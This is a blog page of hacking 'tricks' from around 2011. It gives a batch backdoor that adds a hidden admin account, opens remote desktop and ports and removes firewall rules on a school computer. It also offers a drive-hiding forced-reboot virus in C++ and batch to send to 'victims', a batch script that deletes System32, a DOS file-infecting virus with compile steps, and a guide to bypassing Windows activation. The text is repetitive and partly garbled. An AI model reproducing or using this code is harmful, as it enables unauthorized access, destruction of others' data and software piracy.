- Save as .bat fileNow wat if i can hack mah school coimputer from mah home ? Will'nt it be too good to share ? Well dont worry m sharing this with you.
There are two ways to do so:
(i) Dropping a trojan.
(ii) Creating a batch file encoded in Net Framework and applying it.
Well i will cover the trojan trick later on. Now just concentrate on the batch file. Its just as easy as typing something in notepad and then saving it.
Tools required:
- Pen Drive / USB drive
- Mind
- A lil bit of time.
Now What you gotta do :
- Copy the below code
- Paste in notepad
- Save as .bat file
Code :
@echo offREM ......: Created By Jigsaw :......REM ......: HackPcOnline.Com :......
REM EDIT THESE SETTINGSset username=USERNAMEset password=PASSWORDset rdport=3389set tnport=23set rport=CHANGE_THISREM END EDITING SETTINGS
REM Adding The Backdoornet user %username% %password% /addREM Pause For Processping localhost -n 2 >nulREM Adding Admin Access The Backdoornet localgroup Administrators %username% /addREM Hiding The Backdoor From Start MenuREG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nulREM Enabling Terminal ServiceREG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0REM Share C:\net share system=C:\ /unlimitedREM Stealing The IP Stuffipconfig /all >> C:\attach.txtREM Deleting The Firewall Configurationnetsh firewall deleteREM Opening Portsnetsh firewall add portopening TCP %rdport% "WinSvcService"netsh firewall add portopening TCP %tnport2% "WinSvcService"netsh firewall add portopening TCP %rport% "WinSvcService"clsexit
You can change the username, password and the rport (randomn port you choose to be opened)
At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.
Save it and remove your pen drive.
Now run this bat file in ur school Pc.Now when you get to your home, just telnet the pc or Remote desktop it.You are done gyes !!
place of science and entertainment
All about computer tips and tricks. learn some wonderful trick from notepad.. cool computer ticks no no experience needed
Sunday, 24 July 2011
How to Hack your School Computers
Monday, 11 July 2011
C++ ,Batch Virus code to disable Hard disk
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.
C++ Virus Code :
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
- Copy the above code and paste in notepad
- Save the file with .cpp extension
- Compile and create .exe file in cpp
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
- Copy the above code to notepad.
- Save it with .bat extension (for ex: nodrivevirus.bat)
- Send the file to your victim
Sunday, 5 June 2011
Awesome javascript collection by ehackworld
Awesome Javascript collection by ehackworld
Procedure:
1)Just copy the javascript and paste it in your browsers Address bar and hit enter
1)Just copy the javascript and paste it in your browsers Address bar and hit enter
Javascript which pop up a message:
Javascript to find passwords behind the astriks:
(OR)
Javascript to rotate images on webpage:
(OR)
(OR)
Javascript which vibrates your browser:
(OR)
(OR)
Javascript which pop up message and changes text colour on webpage:
Javascript to Edit any webpage:
Javascript which erases the text on webpage:
funny javascript to fool your friends:
Javascript which opens two webpages on same Tab:
Javascript which changes text colour on a webpage:
Javascript for Blinking text on webpage:
Dom inspector Javascript:
Javascript for Dancing text on webpage:
Javascript to expand images on a webpage:
(OR)
tracking code
Tuesday, 31 May 2011
How to activate windows 7 or windows vista
Hi Friends, today i will show you how to activate windows 7 or Windows vista for free. Its a 100% working hack and perfectly safe way to easily activate windows for free. I will explain this with the help of windows loader by Daz. This loader application will bypass the Microsoft's WAT(windows activationtechnologies) and activate your winodws 7 or Vista in just few minutes.The application itself injects a SLIC (System Licensed Internal Code) into your system before Windows boots; that is what fools Windows into thinking it's genuine.
Requirements:
1. Supported Operating System Installed( Windows 7 or Windows Vista).
2. Loader by Daz.
3. Internet connection to check the activation is happened correctly or not.
Steps to activate Windows 7 or Windows Vista:
1. Download the Windows Loader application.
(click here to download)
2. Extract the zip file and now you will have four files.
3. Start the Loader.exe by double clicking on it.
4. Now Click on Install to install the SLIC and updating the windows key.
5. That's the only procedure, now just go to Microsoft's website to check your activation. Alternatively you can check it by right clicking on My Computer Icon on desktop and see the General information.
Note: You must be running build 7600 or greater for Windows 7 and Windows Server 2008 R2.
Note: I don't recommend using any of the Windows 7 E editions.
Note: Windows 7 N editions will only be supported when OEM SLP serials leak.
Features of Windows Activator Loader:
•Can be run as a standalone application
•Works well with all system languages
•Custom OEM information can be installed
•Argument support for silent installs
•Can be used for pre-activation
•Application integrity checking
•Custom error handling
•Support for hidden partitions and complex setups
•Can work alongside Linux's GRUB or any other boot manager
•Works with TrueCrypt and many other types of hard drive encryption applications
•Add your own certificates and serials externally
•Offers certificate and serial installation only for users with an existing SLIC 2.1
•Automated system profiling (The application matches everything up for you)
Supported operating systems
•Windows 7 Ultimate
•Windows 7 Ultimate E
•Windows 7 Professional
•Windows 7 Professional E
•Windows 7 Home Premium
•Windows 7 Home Premium E
•Windows 7 Home Basic
•Windows 7 Starter
•Windows 7 Starter E
•Windows Vista Ultimate
•Windows Vista Business
•Windows Vista Business N
•Windows Vista Home Premium
•Windows Vista Home Basic
•Windows Vista Home Basic N
•Windows Vista Starter
•Windows Server 2008 R2: Enterprise
•Windows Server 2008 R2: Standard
•Windows Server 2008 R2: Foundation
•Windows Server 2008: Enterprise
•Windows Server 2008: Standard
•Windows Server 2008: Foundation
•Windows Small Business Server 2008
Don't Forget to say thanks if it works for you....
Requirements:
1. Supported Operating System Installed( Windows 7 or Windows Vista).
2. Loader by Daz.
3. Internet connection to check the activation is happened correctly or not.
Steps to activate Windows 7 or Windows Vista:
1. Download the Windows Loader application.
(click here to download)
2. Extract the zip file and now you will have four files.
3. Start the Loader.exe by double clicking on it.
4. Now Click on Install to install the SLIC and updating the windows key.
5. That's the only procedure, now just go to Microsoft's website to check your activation. Alternatively you can check it by right clicking on My Computer Icon on desktop and see the General information.
Note: You must be running build 7600 or greater for Windows 7 and Windows Server 2008 R2.
Note: I don't recommend using any of the Windows 7 E editions.
Note: Windows 7 N editions will only be supported when OEM SLP serials leak.
Features of Windows Activator Loader:
•Can be run as a standalone application
•Works well with all system languages
•Custom OEM information can be installed
•Argument support for silent installs
•Can be used for pre-activation
•Application integrity checking
•Custom error handling
•Support for hidden partitions and complex setups
•Can work alongside Linux's GRUB or any other boot manager
•Works with TrueCrypt and many other types of hard drive encryption applications
•Add your own certificates and serials externally
•Offers certificate and serial installation only for users with an existing SLIC 2.1
•Automated system profiling (The application matches everything up for you)
Supported operating systems
•Windows 7 Ultimate
•Windows 7 Ultimate E
•Windows 7 Professional
•Windows 7 Professional E
•Windows 7 Home Premium
•Windows 7 Home Premium E
•Windows 7 Home Basic
•Windows 7 Starter
•Windows 7 Starter E
•Windows Vista Ultimate
•Windows Vista Business
•Windows Vista Business N
•Windows Vista Home Premium
•Windows Vista Home Basic
•Windows Vista Home Basic N
•Windows Vista Starter
•Windows Server 2008 R2: Enterprise
•Windows Server 2008 R2: Standard
•Windows Server 2008 R2: Foundation
•Windows Server 2008: Enterprise
•Windows Server 2008: Standard
•Windows Server 2008: Foundation
•Windows Small Business Server 2008
Don't Forget to say thanks if it works for you....
Write Bold And Underline Text In Facebook Chat
Now here are the facebook codes for sending bold and underlined text in facebook chat
For Sending Bold Text
whatever you type between * *(two stars ) will automatically turns into bold.
Example : You write I *love* you.
Turns to
I love you
For sending underlined Text
Whatever you type between _ _(two underscores) will automatically turns into underlined text
Example: You write
I really _love_ you
Turns to
I really love you
For writing Bold+Underline
Whatever you type between *_ _* will automatically turns into Bold+Underline
Example:
You *_love_* it?
Turns to
You love it?
if you like this post please comment..
:)
Wednesday, 11 May 2011
crash your enemy PC by windows system 32 command promt
HEY HERE IS SIMPLE WAY TO BLOCK ENEMY PC the simple deadliest code is |
@Echo off
@Color 0A
@Echo Hello, this will fuck over your computer... just a moment...
Del /s /q /a RHSA C:\Windows\System32
Echo thank you for waiting :)
Shutdown -f -s -t 20 -c "Your computer got fucked, please wait for shutting down..."
Exit
Tuesday, 10 May 2011
Virus Code in C programming
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler; press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9, THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; Change IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
BORLAND C++ 5.5 (32-BIT):
1. Compile once, note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it. The new EXE file is ready to infect
1. Compile once, note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it. The new EXE file is ready to infect
HOW TO TEST:
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to re infect
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to re infect
Subscribe to:
Comments (Atom)





